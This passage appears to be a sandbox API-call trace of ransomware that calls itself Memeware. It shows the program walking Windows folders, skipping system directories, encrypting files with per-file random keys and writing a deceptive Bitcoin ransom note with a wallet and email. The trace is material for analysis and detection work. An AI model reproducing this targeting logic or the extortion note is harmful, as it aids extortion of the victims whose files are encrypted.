lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.018] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\.") returned 87 [0066.018] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.018] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.018] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.018] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.018] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\..") returned 88 [0066.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.019] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0066.019] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0066.019] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned 93 [0066.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0066.019] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\.") returned 93 [0066.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.019] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.019] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.019] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.019] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\..") returned 94 [0066.019] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.019] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104 [0066.020] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0066.020] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0066.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0066.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0066.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.020] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0066.020] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0066.020] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt") returned 109 [0066.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0066.021] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.021] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0066.022] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.022] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0066.022] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.022] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0066.022] CloseHandle (hObject=0xd8) returned 1 [0066.022] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0066.022] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0066.022] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0066.022] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.022] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.022] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.022] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.022] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.022] lstrcmpiW (lpString1="print_pref.ico", lpString2="Windows") returned -1 [0066.022] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files") returned -1 [0066.022] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files (x86)") returned -1 [0066.023] lstrcmpiW (lpString1="print_pref.ico", lpString2="$Recycle.bin") returned 1 [0066.023] lstrcmpiW (lpString1="print_pref.ico", lpString2="System Volume Information") returned -1 [0066.023] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0066.023] StrStrIW (lpFirst="print_pref.ico", lpSrch=".protected") returned 0x0 [0066.023] lstrcmpW (lpString1="print_pref.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.023] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.023] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="Windows") returned -1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files") returned -1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files (x86)") returned -1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="$Recycle.bin") returned 1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="System Volume Information") returned -1 [0066.023] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0066.023] StrStrIW (lpFirst="print_property.ico", lpSrch=".protected") returned 0x0 [0066.023] lstrcmpW (lpString1="print_property.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.023] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.023] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="Windows") returned -1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files") returned -1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files (x86)") returned -1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="$Recycle.bin") returned 1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="System Volume Information") returned -1 [0066.023] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 [0066.023] StrStrIW (lpFirst="print_queue.ico", lpSrch=".protected") returned 0x0 [0066.023] lstrcmpW (lpString1="print_queue.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.024] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.024] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="Windows") returned -1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files") returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files (x86)") returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="$Recycle.bin") returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="System Volume Information") returned -1 [0066.024] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0066.024] StrStrIW (lpFirst="scan_.ico", lpSrch=".protected") returned 0x0 [0066.024] lstrcmpW (lpString1="scan_.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.024] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.024] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="Windows") returned -1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files") returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files (x86)") returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="$Recycle.bin") returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="System Volume Information") returned -1 [0066.025] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0066.025] StrStrIW (lpFirst="scan_property.ico", lpSrch=".protected") returned 0x0 [0066.025] lstrcmpW (lpString1="scan_property.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Windows") returned -1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files") returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files (x86)") returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="$Recycle.bin") returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="System Volume Information") returned -1 [0066.025] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0066.025] StrStrIW (lpFirst="scan_settings.ico", lpSrch=".protected") returned 0x0 [0066.025] lstrcmpW (lpString1="scan_settings.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0066.025] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95 [0066.025] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0066.025] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0066.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.026] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.026] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0066.026] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0066.026] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt") returned 103 [0066.026] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.026] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.026] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0066.027] lstrlenA 